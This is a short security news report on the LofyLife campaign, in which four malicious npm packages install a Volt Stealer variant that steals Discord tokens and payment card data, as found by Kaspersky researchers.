Multiple npm packages are being used in an ongoing malicious campaign dubbed LofyLife to infect Discord users with malware that steals their payment card information.
The malware used in these attacks is a variant of the open-source and Python-based Volt Stealer token logger, according to Kaspersky security researchers Igor Kuznetsov and Leonid Bezvershenko.
“On July 26, using the internal automated system for monitoring open-source repositories, we identified four suspicious packages in the Node Package Manager (npm) repository,” the researchers said.
The malware is automatically deployed after installing the small-sm, pern-valids, lifeculer, or proc-title malicious npm modules.
Once installed, it collects Discord tokens and system information, including the victims’ IP addresses.
Monitors Discord users to steal their data
It works by monitoring the victims’ actions, such as Discord logins, attempts to change the credentials, multi-factor authentication (MFA) toggles, or the addition of new payment methods to steal Discord accounts and complete payment information.
Once harvested, this data is uploaded to one of several Replit-hosted instances whose addresses are hard-coded within the malware (e.g., life.polarlabs.repl[.]co, sock.polarlabs.repl[.]co, idk.polarlabs.repl[.]co).
Kaspersky added that they’re still monitoring updates to npm repositories to ensure that all new malicious packages pushing this info stealer are detected and removed.
This is a recurring theme among malicious npm packages, and it’s just one of a seemingly endless stream of malware specifically tailored to target Discord users in recent years with information stealers.
For instance, in 2019, malware dubbed Spidey Bot was used to modify the Windows Discord client to backdoor it and deploy an information-stealing trojan.
Malicious npm and PyPI libraries were also used to target Discord users, steal their user tokens and browser information, and install MBRLocker data wiping malware calling itself Monster Ransomware.